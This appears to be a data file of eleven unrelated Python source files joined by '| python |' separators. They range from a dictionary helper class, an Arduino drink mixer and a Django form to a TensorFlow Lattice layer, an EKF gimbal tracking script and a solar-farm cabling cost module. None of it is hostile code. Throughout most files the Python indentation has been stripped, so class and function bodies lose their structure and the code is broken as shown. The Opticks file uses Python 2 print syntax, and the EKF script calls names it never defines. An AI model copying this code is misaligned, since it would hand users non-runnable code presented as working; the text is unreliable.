from typing import get_type_hints, TypeVar, Type
__all__ = ["Storage"]
T = TypeVar('T')
class Storage(dict):
"""
A Storage object is like a dictionary except `obj.foo` can be used
in addition to `obj['foo']`.
>>> o = Storage(a=1)
>>> o.a
1
>>> o['a']
1
>>> o.a = 2
>>> o['a']
2
>>> del o.a
>>> o.a
Traceback (most recent call last):
...
AttributeError: 'a'
"""
def __getattr__(self, key):
try:
return self[key]
except KeyError as k:
raise AttributeError(k)
def __setattr__(self, key, value):
self[key] = value
def __delattr__(self, key):
try:
del self[key]
except KeyError as k:
raise AttributeError(k)
def __repr__(self):
return '<Storage ' + dict.__repr__(self) + '>'
    def __sub__(self, other):
        """Remove a single key (given a string) or every key in an iterable of keys."""
        if isinstance(other, str):
            if other in self:
                del self[other]
        else:
            for key in other:
                self.__sub__(key)
        return self
@staticmethod
def type_hints(cls: Type) -> 'Storage':
result = Storage()
for prop_name, prop_type in get_type_hints(cls).items():
if prop_name[0] != '_':
result[prop_name] = prop_type
else:
pub_name = prop_name[1:]
if isinstance(getattr(cls, pub_name, None), property):
result[pub_name] = prop_type
return result
@staticmethod
def of(obj) -> 'Storage':
result = Storage()
for name in get_type_hints(obj).keys():
if name[0] == '_':
name = name[1:]
if hasattr(obj, name):
result[name] = getattr(obj, name)
return result
def to(self, cls: Type[T]) -> T:
obj = cls()
for key, val in self.items():
setattr(obj, key, val)
return obj
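# A minimal usage sketch of the typed helpers above (the `Point` class is
# hypothetical, for illustration only):
#
#     class Point:
#         x: int
#         _y: int
#         @property
#         def y(self):
#             return self._y
#
#     Storage.type_hints(Point)         # <Storage {'x': <class 'int'>, 'y': <class 'int'>}>
#     p = Storage(x=1, _y=2).to(Point)  # copies each key onto a fresh Point
#     Storage.of(p)                     # <Storage {'x': 1, 'y': 2}>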
| python |
from libarduino import pinMode, digitalWrite, analogRead
import time
class Actuator():
def __init__(self, port):
self.port = port
pinMode(self.port, 'OUTPUT')
def activate(self):
digitalWrite(self.port, 1)
def deactivate(self):
digitalWrite(self.port, 0)
class Ranger():
def __init__(self, port, drink):
self.port = port
self.drink = drink
def read(self):
return analogRead(self.port)
class Mixer():
def __init__(self, motor, piston, rangers, valves, capacity=250, drinks=2, dist=128):
self.motor = motor
self.piston = piston
self.rangers = rangers
self.valves = valves
self.capacity = capacity
self.drinks = drinks
self.dist = dist
def mix_drink(self,recipe):
use = [] # Use these liquids.
for i in range(self.drinks):
if recipe[i] > 0:
use.append(i)
for i in use:
while self.rangers[i].read() > self.dist:
self.motor.activate()
time.sleep(0.1)
self.motor.deactivate()
start_time = time.time()
self.valves[i].activate()
            const = 1 # Relates fill time to the volume of liquid that passes through a valve. TODO: find the proper constant.
fill_time = recipe[i] * self.capacity * const
while (time.time() - start_time) < fill_time:
                print('Standing still')
self.valves[i].deactivate()
def serve(self,piston_time=7,ranger=0):
# Get to piston position
while self.rangers[ranger].read() > self.dist:
self.motor.activate()
time.sleep(0.1)
start_time = time.time()
self.piston.activate()
while (time.time() - start_time) < piston_time:
            print('Serving drink')
self.piston.deactivate()
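# A minimal wiring sketch (port numbers and the recipe are hypothetical;
# each recipe entry is the fraction of `capacity` to pour from that drink):
#
#     motor = Actuator(2)
#     piston = Actuator(3)
#     rangers = [Ranger(0, 0), Ranger(1, 1)]
#     valves = [Actuator(4), Actuator(5)]
#     mixer = Mixer(motor, piston, rangers, valves)
#     mixer.mix_drink([0.5, 0.5])
#     mixer.serve()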
| python |
from django import forms
class CartAddForm(forms.Form):
    quantity = forms.IntegerField(min_value=1, max_value=9)
| python |
#!/usr/bin/python
# Copyright 2020 Makani Technologies LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Converts a JSON file to a MATLAB .mat file.
Usage: json_to_mat.py foo.json
"""
import collections
import json
import os
import sys
import scipy.io
def _Sanitize(data):
"""Converts data to a format acceptable by scipy.io.savemat.
The scipy.io.savemat function cannot handle Booleans, NoneTypes, or
unicode strings.
Args:
data: Dictionary returned by json.load.
Returns:
Sanitized dictionary that is compatible with scipy.io.savemat.
"""
if isinstance(data, collections.OrderedDict):
return collections.OrderedDict([(str(k), _Sanitize(v))
for k, v in data.items()])
if isinstance(data, dict):
return {str(k): _Sanitize(v) for k, v in data.items()}
elif isinstance(data, list):
return [_Sanitize(x) for x in data]
elif data is None:
return []
elif isinstance(data, bool):
return 1 if data else 0
else:
return data
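# For example (illustrative only):
#   _Sanitize({u'a': True, 'b': None, 'c': [False, 1.5]})
#   # -> {'a': 1, 'b': [], 'c': [0, 1.5]}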
def _PrintUsage():
  print()
  print('Usage: json_to_mat.py foo.json')
  print()
def main(argv):
if len(argv) != 2:
    print('Error: Wrong number of arguments.')
_PrintUsage()
sys.exit(1)
if not os.path.isfile(argv[1]):
    print('Error: File does not exist.')
_PrintUsage()
sys.exit(1)
with open(argv[1], 'r') as f:
data = _Sanitize(json.load(f, object_pairs_hook=collections.OrderedDict))
filename, _ = os.path.splitext(argv[1])
scipy.io.savemat(filename + '.mat', data, long_field_names=True)
if __name__ == '__main__':
main(sys.argv)
| python |
#-*- coding: utf-8 -*-
__all__ = ['LEA','ECB','CBC','CTR','CFB','OFB','CCM','GCM','CMAC']
from .LEA import LEA
from .ECB import ECB
from .CBC import CBC
from .CTR import CTR
from .CFB import CFB
from .OFB import OFB
from .CCM import CCM
from .GCM import GCM
from .CMAC import CMAC
from .CipherMode import CipherMode, ENCRYPT_MODE, DECRYPT_MODE
from .CipherMode import TagError
| python |
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Layer which represents aggregation function.
See class level comment.
This layer applies the provided model to the ragged input tensor and aggregates
the results.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from tensorflow import keras
class Aggregation(keras.layers.Layer):
# pyformat: disable
"""Layer which represents an aggregation function.
Calls the model on each of the ragged dimensions and takes the mean.
Input shape:
A list or dictionary with num_input_dims Rank-2 ragged tensors with
shape: (batch_size, ?)
Output shape:
Rank-2 tensor with shape: (batch_size, 1)
Attributes:
    - All `__init__` arguments.
Example:
```python
model = tf.keras.Model(inputs=inputs, outputs=outputs)
layer = tfl.layers.Aggregation(model)
```
"""
# pyformat: enable
def __init__(self, model, **kwargs):
"""initializes an instance of `Aggregation`.
Args:
model: A tf.keras.Model instance.
**kwargs: Other args passed to `tf.keras.layers.Layer` initializer.
Raises:
      ValueError: if model is not a `tf.keras.Model` instance.
"""
if not isinstance(model, tf.keras.Model):
raise ValueError('Model must be a tf.keras.Model instance.')
super(Aggregation, self).__init__(**kwargs)
# This flag enables inputs to be Ragged Tensors
self._supports_ragged_inputs = True
self.model = model
def call(self, x):
"""Standard Keras call() method."""
return tf.reduce_mean(tf.ragged.map_flat_values(self.model, x), axis=1)
def get_config(self):
"""Standard Keras get_config() method."""
config = super(Aggregation, self).get_config().copy()
config.update({'model': tf.keras.utils.serialize_keras_object(self.model)})
return config
@classmethod
def from_config(cls, config, custom_objects=None):
model = tf.keras.utils.deserialize_keras_object(
config.pop('model'), custom_objects=custom_objects)
return cls(model, **config)
| python |
#This file contains a common EKF tracking code for both elevator and rover
#It checks variable from file config.npy to figure out its own type
import time
from datetime import datetime
import subprocess
import numpy as np
from numpy import linalg
from numpy.linalg import inv
import math
import cmath
import linalgfunc
import pdb
import os
import serial
import sys, glob
import random
import Adafruit_BBIO.GPIO as GPIO
import pickle
#Libraries made for convenience
from analog import Analog
from motion_tracking_socket3D import MotionTrackingSocket3D
from led import LED
from trigger_socket import TriggerSocket
from motor_system import MotorSystem
import my_functions as mf
def initialize():
global num_iteration
num_iteration = 200
global A
A = np.identity(3)
global I
I = np.identity(3)
global B
B = np.matrix([[0,0],[1,0],[0,1]])
global Q
Q = np.matrix([[0.00001,0,0],[0,0.0005,0],[0,0,0.0005]])
global Q_scaling
Q_scaling = 1000000
global R
R = 1
global P_f
P_f = np.matrix([[0.100,0,0],[0,0.50,0],[0,0,0.50]])
global P
P = P_f
global scan_parameters_all
scan_parameters_all = np.zeros((num_iteration,6))
global x_hatf_all
x_hatf_all = np.zeros((num_iteration,3))
global x_hat_all
x_hat_all = np.zeros((num_iteration,3))
    global x_I_hat_all
    x_I_hat_all = np.zeros((num_iteration,3))
global y_hat_all
y_hat_all = np.zeros(num_iteration)
global y_all
y_all = np.zeros(num_iteration)
global eigP_all
eigP_all = np.zeros(num_iteration)
global Pf_all
Pf_all = np.zeros((num_iteration,3,3))
global P_all
P_all = np.zeros((num_iteration,3,3))
global C_all
C_all = np.zeros((num_iteration,3))
global K_all
K_all = np.zeros((num_iteration,3))
global u_all
u_all = np.zeros((num_iteration,3))
global motor_commands_all
motor_commands_all = np.zeros((num_iteration,2))
global x_ground_truth_all
x_ground_truth_all = np.zeros((num_iteration,6))
global time_all
time_all = np.zeros(num_iteration)
def setup():
global receiver
receiver = Analog()
global Gimbal
Gimbal = MotorSystem()
Gimbal.TakeGroundPosition()
global motion_socket
motion_socket = MotionTrackingSocket3D()
global MyRobotName
MyRobotName = mf.read_file("my_type.txt").split()[0]
global scan_alternation_flag
global c
if MyRobotName == 'Rover':
initial_pitch = 7
initial_yaw = 7
scan_alternation_flag = 1
c = 15
from underlying_robot import Robot
global myBot
myBot = Robot(motion_socket,MyRobotName,3,0.6)
elif MyRobotName == 'Elevator':
initial_pitch = 6
initial_yaw = -8
scan_alternation_flag = 0
c = 15
MyRobotName2 = mf.read_file("my_name.txt").split()[0]
local_config_file_name = MyRobotName2 + '_config.txt'
s = mf.read_file(local_config_file_name)
local_config = s.split(' ')
global bias_angle
bias_angle = float(local_config[8])
global receiver_sum_angle
global base_sum_angle
receiver_sum_angle = initial_pitch
base_sum_angle = initial_yaw
global communication_flag
communication_flag = int(mf.read_file("communication_flag.txt"))
if communication_flag == 0:
global txLED
txLED = LED()
txLED.on()
else:
from receiver_handle import ReceiverHandle
global RxRoutine
RxRoutine = ReceiverHandle(scan[1])
global TxRoutine
TxRoutine = TransmissionHandle()
yaw1 = Gimbal.get_yaw()
x = motion_socket.x
if bias_angle == 180:
yaw2 = x[0]%360-180
else:
yaw2 = x[0]
#pdb.set_trace()
if abs(yaw1-yaw2)>1.0:
motion_socket.stop()
Gimbal.Deactivate()
txLED.off()
pdb.set_trace()
raise Exception("Sorry, the robot is not aligned, please correct the orientation: ",yaw2)
Gimbal.WriteAbsoluteAngles([initial_yaw,initial_pitch])
x = motion_socket.x
pitch = Gimbal.get_pitch()
yaw = Gimbal.get_yaw()
print('Reached absolute yaw at ',yaw,' degrees, and absolute pitch at ',pitch,' degrees')
if bias_angle == 180:
yaw = x[0]%360-180
else:
yaw = x[0]
print('From Motion Tracking System yaw = ',yaw,' and pitch = ',x[1])
def trigger_setup():
current_time = time.time()
print("Current time: %f" %(current_time))
global my_trigger
my_trigger = TriggerSocket()
print("Waiting for the starting trigger on ", MyRobotName)
global t_START
t_START, duty, tIdle= my_trigger.waitForTrigger()
mf.wait_till(t_START+3)
global toc
toc = time.time()
print("Process triggered at time ",datetime.fromtimestamp(toc).strftime('%Y %m %d_%I:%M:%S.%f %p'), ' on ', MyRobotName)
if MyRobotName == 'Rover':
myBot.duty = duty
myBot.idle_time = tIdle
myBot.motion_state = True
def closing_setup():
Gimbal.Deactivate()
file_name = MyRobotName + '_3D_EKF_data'
txt_file_name = file_name + '_recent_files_name.txt'
zip_name = file_name + datetime.fromtimestamp(toc).strftime('_%Y-%m-%d_%I:%M_%p.npz')
received_data_pkl_file_name = file_name + '_received_data' + datetime.fromtimestamp(toc).strftime('_%Y-%m-%d_%I:%M_%p.pkl')
iteration_num_pkl_file_name = file_name + '_iteration_nums'+ datetime.fromtimestamp(toc).strftime('_%Y-%m-%d_%I:%M_%p.pkl')
file2write = open(txt_file_name,'w')
file2write.write(zip_name + ' ')
if communication_flag == 0:
txLED.off()
else:
RxRoutine.stop()
TxRoutine.deactivate_transmission()
file2write.write(received_data_pkl_file_name + ' ')
file2write.write(iteration_num_pkl_file_name)
iteration_nums = RxRoutine.iteration_nums
received_data = RxRoutine.received_data
#np.save('recent_file_name.npy',common_file_name)
f = open(iteration_num_pkl_file_name,"wb")
pickle.dump(iteration_nums,f)
f.close()
f = open(received_data_pkl_file_name,"wb")
pickle.dump(received_data,f)
f.close()
file2write.close()
np.savez(zip_name, scan_parameters_all=scan_parameters_all, \
x_hatf_all=x_hatf_all, x_hat_all=x_hat, Pf_all=Pf_all,\
C_all=C_all, y_hat_all=y_hat_all,\
y_all=y_all, P_all=P_all, K_all=K_all, timer=timer,interval = interval,\
u_all=u_all, scan_psi_all=scan_psi,scan_theta_all=scan_theta, \
motor_commands_all=motor_commands_all, x_ground_truth_all=x_ground_truth_all,theta_all = theta)
message = MyRobotName+" is Done!"
my_trigger.sendFinisherFlag(message.encode())
my_trigger.Deactivate()
if MyRobotName == 'Rover':
myBot.takeGroundPosition()
motion_socket.stop()
initialize()
setup()
x_ground_truth_all[0] = motion_socket.x
#Variables Initialization
diff_sum = 0
x_hat = np.zeros((num_iteration,3))
comm_array = np.zeros(7)
x_hat[0,:] = [0.5,0,0]
x_hat_k_f = [0.5,0,0]
x_I_hat = np.zeros((num_iteration,3))
x_I_hat[0,:] = x_hat[0,:]
x_hatf_all[0,:] = x_hat[0,:]
x_I_hat_k = x_hat_k_f
x_hat_k_p = x_hat_k_f
y_hat = 0
K = np.identity(3)
C = np.identity(3)
y = 0
u2 = 0
u3 = 0
u = [0,u2,u3]
psi = np.zeros(num_iteration+1)
timer = np.zeros(num_iteration+1)
theta = np.zeros(num_iteration+1)
scan_psi = np.zeros(num_iteration+1)
scan_theta = np.zeros(num_iteration+1)
difference = np.zeros(num_iteration+1)
angle_bias = np.zeros(num_iteration+1)
difference[0] = 0.5
theta[0] = Gimbal.get_pitch()
scan_theta[0] = theta[0]
# ReceiverStepper.rotateMotor(-theta[0])
# receiver_sum_angle = receiver_sum_angle -theta[0]
interval = np.zeros(num_iteration)
disturbance = 1 #degree/second
T = 0.8
T_factor = 2 #assuming 2.5 seconds for the full circle
t_Iter = 0.5 #assigned time for 1 step
switch = 0
#scanning terms
phi = 120
scan_radius = 4
radius = 4
bias = angle_bias[0]
k_factor = 360/phi
scan_counter = (360/phi)*scan_alternation_flag-1
pause_flag = 0
active_phase = 0
alpha_bias = 0
beta_bias = 0
Motor_command_receiver = 0
Motor_command_base = 0
termination_flag =1
is_moving = 0
if(is_moving == 0):
min_radius = 2
else:
min_radius = 4
max_radius = 6
Vmax = 0.0
trigger_setup()
x_ground_truth_all[0] = motion_socket.x
set_time = t_START + t_Iter +3
tdiff_min = 1000
for i in range(1,num_iteration):
#print 'i= %d' %(i)
#u = [0,0,0]
Gimbal.ApplyMotorCommandsSync([Motor_command_base, Motor_command_receiver])
y = receiver.getIntensity()
theta[i] = Gimbal.get_pitch()
if y>Vmax:
Vmax = y
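    # EKF prediction: propagate the previous estimate with the control input u = [0, u2, u3]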
x_hat_k_f = x_hat[i-1,:] + [0,u2,u3]
y_hat,C = mf.get_output_and_jacobian(alpha_bias,beta_bias,x_hat_k_f,c)
#pdb.set_trace()
if(active_phase == 1 and termination_flag == 1):
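        # Full measurement update (active phase): covariance prediction (A is the
        # identity, so A*P*A' reduces to P + Q_scaling*Q), Kalman gain, state
        # correction, and an integral state for the PI pointing controller below.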
P_f = A*P*A + Q_scaling*Q
#Filtering
K = P_f*np.transpose(C)*linalg.inv(C*P_f*np.transpose(C) + R)
        x_hat_k_p = np.array(np.mat(x_hat_k_f).T+K*(y-y_hat)).T[0] # [0] makes it a one-dimensional array rather than a 2D array
if x_hat_k_p[0] < 0:
x_hat_k_p[0] = 0
x_I_hat_k = x_I_hat[i-1,:] + x_hat_k_p*interval[i-1]
P = (np.identity(3) - K*C)*P_f
difference[i] = abs((y-y_hat)/y)
min_ind = max(i-2,0)
diff_sum = sum(difference[min_ind:i+1])/3
if(diff_sum < 0.5):
G = 0.98*pause_flag
Gi = 0.2*pause_flag
else:
G = 0
Gi = 0
u2 = -G*x_hat_k_p[1] - Gi*x_I_hat_k[1]
u3 = -G*x_hat_k_p[2] - Gi*x_I_hat_k[2]
else:
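        # Scanning phase: a scalar EKF update on the intensity state x[0] only;
        # the two pointing-error states are frozen and no control is applied.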
P_f_partial = A[0,0]*P[0,0]*A[0,0] + Q_scaling*Q[0,0]
P_f[0,0] = P_f_partial
K = P_f_partial*(C[0,0])/(C[0,0]*P_f_partial*C[0,0] + R)
x_hat_k_p[0] = x_hat_k_f[0]+K*(y-y_hat)
x_I_hat_k = [0,0,0]
x_I_hat_k[0] = x_I_hat[i-1,0] + x_hat_k_p[0]*interval[i-1]
P[0,0] = (1 - K*C[0,0])*P_f_partial
u2 = 0
u3 = 0
u = [0,u2,u3]
#print 'normal_u2 %f, normal_u3 %f' %(normal_u2, normal_u3)
P_all[i,:,:] = P
x_hatf_all[i,:] = x_hat_k_f
scan_parameters_all[i,:] = [beta_bias,alpha_bias, scan_counter, active_phase, pause_flag, scan_radius]
C_all[i,:] = C
Pf_all[i,:,:] = P_f
y_all[i] = y
y_hat_all[i] = y_hat
K_all[i,:] = np.transpose(K)
x_I_hat[i,:] = x_I_hat_k
x_hat[i,:] = x_hat_k_p
u_all[i,:] = u
motor_commands_all[i] = [Motor_command_base,Motor_command_receiver]
toc = time.time()
timer[i] = toc-t_START
interval[i] = timer[i] - timer[i-1]
if(i>0):
T = sum(interval[1:i+1])/i
comm_array[0] = i
comm_array[1] = timer[i]
comm_array[2] = x_hat[i,0]
comm_array[3] = x_hat[i,1]
comm_array[4] = x_hat[i,2]
comm_array[5] = y
comm_array[6] = y_hat
#np.save(npy_name,comm_array)
#sftp.put(npy_name,remote_path + npy_name)
previous_alpha_bias = scan_radius*mf.sind(bias)
previous_beta_bias = scan_radius*mf.cosd(bias)
P_angles = P[1:3,1:3]
    V = np.linalg.eig(P_angles)[0] # Eigenvalues of the pointing-error covariance
    eigP_all[i] = max(V) # Largest eigenvalue
scan_counter = scan_counter%(2*k_factor) + 1
if(scan_counter == 1):
pause_flag = 1
if(y < 0.5*Vmax):
termination_flag = 1
if(scan_counter == k_factor+1):
pause_flag = 0
if(scan_counter == 2*k_factor):
active_phase = 1
if(scan_counter == k_factor+1):
active_phase = 0
if(i>20): #After this it becomes adaptive
min_ind = int(max(i-k_factor,0))
e = sum(eigP_all[min_ind:i])/k_factor
#radius = (min(20,max(min_radius, math.floor((e)/200)))+radius)/2
radius = min(max_radius,max(min_radius, math.floor((e)/6000)))
if((radius == 0) and (y > 7*Vmax)):
print("Reached terminal condition!!!")
            termination_flag = 0 + is_moving # Only zero when is_moving is 0
scan_radius = pause_flag*radius*termination_flag
#Computing scanning parameters for the next iteration
angle_bias[i+1] = (scan_counter-1)*phi
bias = angle_bias[i+1]
alpha_bias = scan_radius*mf.sind(bias)
beta_bias = scan_radius*mf.cosd(bias)
motor_commands =mf.generate_motor_commands_old(theta[i], previous_alpha_bias,previous_beta_bias, u, alpha_bias, beta_bias)
Motor_command_base = motor_commands[0,0]
Motor_command_receiver = motor_commands[0,1]
base_sum_angle = base_sum_angle + Motor_command_base
receiver_sum_angle = receiver_sum_angle + Motor_command_receiver
#theta[i+1] = receiver_sum_angle
time_all[i] = set_time-t_START
tDiff= mf.wait_till(set_time)
if tDiff<tdiff_min:
tdiff_min = tDiff
#print "Iteration: %d, Scan_radius: %d, Angle %d" %(i,scan_radius,bias)
x_ground_truth_all[i] = motion_socket.x
set_time = set_time + t_Iter
# sys.stdout.write("Iteration: %d / %d \r" % (i,num_iteration) )
# #sys.stdout.write("Measurements: %f / %f \r" % (y,Vmax) )
# sys.stdout.flush()
print("Iteration: %d / %d \r" % (i,num_iteration) )
if bias_angle == 180:
yaw = x_ground_truth_all[i,0]%360-180
else:
yaw = x_ground_truth_all[i,0]
print('From Motion Tracking System yaw = ',yaw,' and pitch = ',x_ground_truth_all[i,1], ' tDiff ',tDiff)
print('Minimum wait was: ',tdiff_min)
closing_setup()
print('Done!')
| python |
from Jumpscale import j
class Nodes:
def __init__(self, session, url):
self._session = session
self._base_url = url
j.data.schema.add_from_path(
"/sandbox/code/github/threefoldtech/jumpscaleX_threebot/ThreeBotPackages/tfgrid/directory/models"
)
self._model = j.data.schema.get_from_url("tfgrid.directory.node.2")
def list(self, farm_id=None, country=None, city=None, cru=None, sru=None, mru=None, hru=None, proofs=False):
query = {}
if proofs:
query["proofs"] = "true"
        args = {
            "farm": farm_id,
            "country": country,
            "city": city,
            "cru": cru,
            "sru": sru,
            "mru": mru,
            "hru": hru,
        }
for k, v in args.items():
if v is not None:
query[k] = v
resp = self._session.get(self._base_url + "/nodes", params=query)
nodes = []
for node_data in resp.json():
node = self._model.new(datadict=node_data)
nodes.append(node)
return nodes
def get(self, node_id, proofs=False):
params = {}
if proofs:
params["proofs"] = "true"
resp = self._session.get(self._base_url + f"/nodes/{node_id}", params=params)
return self._model.new(datadict=resp.json())
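# A minimal usage sketch (the URL, session, and node id are illustrative
# assumptions, not part of this module):
#
#     import requests
#     nodes = Nodes(requests.Session(), "https://explorer.grid.tf/api/v1")
#     big_nodes = nodes.list(country="BE", mru=16)
#     one_node = nodes.get(42, proofs=True)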
| python |
#!/usr/bin/env python
#
# Copyright (c) 2019 Opticks Team. All Rights Reserved.
#
# This file is part of Opticks
# (see https://bitbucket.org/simoncblyth/opticks).
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
For grabbing ggv arguments for checking
"""
import numpy as np
from env.numerics.npy.prism import Prism, Box
import argparse
def parse_args():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("--save", action="store_true", default=False )
parser.add_argument("--test", action="store_true", default=False )
parser.add_argument("--torch", action="store_true", default=False )
parser.add_argument("--tag", default="" )
parser.add_argument("--testconfig", default="" )
parser.add_argument("--torchconfig", default="" )
parser.add_argument("--animtimemax", default=100 )
args = parser.parse_args()
return args
kv_ = lambda s: [kv.split("=") for kv in s.split("_")]  # list, so it can be iterated more than once
class Torch(object):
def __init__(self, config):
self.config = kv_(config)
self.source = None
self.target = None
for k,v in self.config:
if k == "source":
self.source = np.fromstring(v, sep=",")
elif k == "target":
self.target = np.fromstring(v, sep=",")
else:
pass
pass
pass
self.direction = self.target - self.source
def __repr__(self):
return "\n".join([
"source %25s " % self.source,
"target %25s " % self.target,
"direction %25s " % self.direction
])
def __str__(self):
return "\n".join(["%20s : %s " % (k,v) for k,v in self.config])
class Test(object):
def __init__(self, config):
self.config = kv_(config)
shapes = []
boundaries = []
parameters = []
for k,v in self.config:
if k == "shape":
shapes.append(v)
elif k == "boundary":
boundaries.append(v)
elif k == "parameters":
parameters.append(v)
else:
pass
assert len(shapes) == len(boundaries) == len(parameters)
self.shapes = []
for i in range(len(shapes)):
shape = None
if shapes[i] == "box":
shape = Box(parameters[i], boundaries[i])
elif shapes[i] == "prism":
shape = Prism(parameters[i], boundaries[i])
else:
assert 0
pass
self.shapes.append(shape)
def __str__(self):
return "\n".join(map(str, self.shapes))
def __repr__(self):
return "\n".join(["%20s : %s " % (k,v) for k,v in self.config])
if __name__ == '__main__':
#print "\n".join(sys.argv)
args = parse_args()
torch = Torch(args.torchconfig)
test = Test(args.testconfig)
sh = test.shapes[-1]
print "torch:\n", torch
print repr(torch)
print "test:\n", test
print "sh:\n", sh
| python |
class Frame:
def __init__(self, size):
self.type = None # whether this is an audio/video frame
self.data = None # this is the raw frame data
self.codec = None # codec
self.time_stamp = 0 # TS of the frame
self.size = size
class AudioFrame(Frame):
    def __init__(self, size):
        super().__init__(size)
class VideoFrame(Frame):
def __init__(self, size, reader):
super().__init__(size)
self.data = reader.readn(size)
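# A minimal sketch (assuming a `reader` object whose readn(n) returns n raw bytes):
#
#     frame = VideoFrame(1024, reader)  # reads 1024 bytes of raw frame data
#     frame.codec = 'h264'
#     frame.time_stamp = 0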
| python |
import traceback
import math
import numpy as np
import pandas as pd
from .CostModule import CostModule
class CollectionCost(CostModule):
"""
Assumptions:
1. System contains central inverters of 1 MW rating each. The inverter being
considered is a containerized solution which includes a co-located LV/MV
transformer.
2. PV array is rectangular in design, with an aspect ratio of 1.5:1::L:W
3. Trench for buried cables from each string inverter runs along the perimeter
of the system, and up till the combiner box placed at one of the 4 corners of the
array.
Shown below is a crude visualization of solar farm floor-plan considered in
SolarBOSSE. As mentioned above, the aspect ratio of this solar farm is assumed
    to be 1.5:1::L:W. This is a simple over-generalization, of course, given that
    this is the first version of SolarBOSSE (v.1.0.0). The model is designed so
    that letting the user define the project layout remains possible in the
    future.
Key:
||| - 3 phase HV power cables (gen-tie)
|| - main project road; assumed to have 20+ ton bearing capacity. Also contains
trench along both sides of the road for output circuit cables (DC), as well
as MV power cables from each inverter station going all the way to the
substation.
=== - horizontal road running across the width of project land. Assumed to be of
lower quality than the main project road, and not meant to support cranes.
Smaller maintenance vehicles (like Ford F-150 permissible).
[gen-tie to utility substation/point of interconnection]
|||
|||
|||
|||
________ |||
_____________|inverter|__|||____
| ||-------| |
| || |substation|
| || | |
| || |__________|
| || |
| || |
| ||________ |
| ||inverter| |
|============||==================|
| || |
| || |
| || |
| || |
| || |
| || |
| ||________ |
| ||inverter| |
|============||==================|
| || |
| || |
| || |
| || |
| || |
| ||________ |
| ||inverter| |
|============||==================|
| || |
| || |
| || |
| || |
| || |
|____________||__________________|
Module to calculate:
1. Wiring requirements of system. This includes:
a. Source circuit cabling (from string to combiner box located at end of each
row). The combiner box capacity (number of strings per box) is a user input.
b. Output circuit; from each combiner box to that string's inverter station.
c. Power cable home run; from inverter/transformer station (where it is
transformed to MV) to the plant's substation which is located at the long end
of the plant.
"""
def __init__(self, input_dict, output_dict, project_name):
super(CollectionCost, self).__init__(input_dict, output_dict, project_name)
self.input_dict = input_dict
self.output_dict = output_dict
self.project_name = project_name
self.m2_per_acre = 4046.86
self.inch_to_m = 0.0254
self.m_to_lf = 3.28084
self._km_to_LF = 3.28084 * 1000
# Max allowable voltage drop (VD%) in circuits
self.allowable_vd_percent = 3 / 100
# Specific resistivity of copper between 25 and 50 deg C:
self.Cu_specific_resistivity = 11
def land_dimensions(self):
"""
Given user defined project area, and assumed aspect ratio of 1.5:1, calculate
solar farm's length and width (in m)
"""
land_area_acres = self.input_dict['site_prep_area_acres']
land_area_m2 = land_area_acres * self.m2_per_acre
# Determine width & length of project land respectively:
land_width_m = (land_area_m2 / 1.5) ** 0.5
self.output_dict['land_width_m'] = land_width_m
land_length_m = 1.5 * land_width_m
return land_length_m, land_width_m
def get_quadrant_dimensions(self):
"""
1 inverter for every 1 MW_DC worth of panels. Super imposing the project layout
on a cartesian plane, the main project road (along the long edge of the land)
        is at x = 0. And the southernmost part of the project land is at y = 0. The
area covering each unit MW_DC worth of land will be referred to as a quadrant.
y
|
|
(-x) ------|----- x
|
|
(-y)
"""
# Get length and width of each quadrant:
land_area_acres = self.input_dict['site_prep_area_acres_mw_dc']
land_area_per_inverter_acres = land_area_acres * \
(self.input_dict['inverter_rating_kW'] / 1000)
land_area_m2 = land_area_per_inverter_acres * self.m2_per_acre
# Determine width & length of project land respectively:
land_width_m = self.output_dict['land_width_m']
subarray_width_m = land_width_m / 2
self.output_dict['subarray_width_m'] = subarray_width_m
land_length_m = land_area_m2 / land_width_m
return land_length_m, land_width_m
def inverter_list(self):
"""
Return a tuple of inverters in the project
"""
# Get number of inverters in the project
# dividing by 150 because that's the upper limit on the size of 1 region.
# Where 1 region is the max size of PV array that the collection module
# runs for. If the project size is greater than size of region,
# SolarBOSSE runs the collection cost module
# (floor(project_size / region) + 1) times.
if self.input_dict['system_size_MW_DC'] > 150:
number_of_inverters = 150
else:
number_of_inverters = self.input_dict['system_size_MW_DC']
inverter_list = [n for n in range(round(number_of_inverters))]
self.output_dict['inverter_list'] = inverter_list
return inverter_list
def number_panels_along_x(self):
"""
Assuming portrait orientation of modules, with 2 modules stacked end-to-end.
"""
subarray_width_m = self.output_dict['subarray_width_m']
# Adding 1 inch for mid clamp:
panel_width_m = self.input_dict['module_width_m'] + self.inch_to_m
number_panels_along_x = math.floor(subarray_width_m / panel_width_m)
return number_panels_along_x
def number_rows_per_subquadrant(self):
"""
2 sub-quadrants per quadrant; one sub-quadrant on either side of the main
project road. 2 sub arrays per quadrant; accordingly, 1 sub-array per
sub-quadrant. And each sub-quadrant is rated for half of quadrant's DC
rating.
"""
module_rating_W = self.input_dict['module_rating_W']
# multiplied by 2 since 2 modules end-to-end in portrait orientation
single_row_rating_W = 2 * self.number_panels_along_x() * module_rating_W
# Since each quadrant is sized according to inverter rating (DC)
inverter_rating_W = self.input_dict['inverter_rating_kW'] * 1000 * \
self.input_dict['dc_ac_ratio']
num_rows_sub_quadrant = math.floor((inverter_rating_W / 2) / single_row_rating_W)
return num_rows_sub_quadrant
def number_modules_per_string(self):
"""
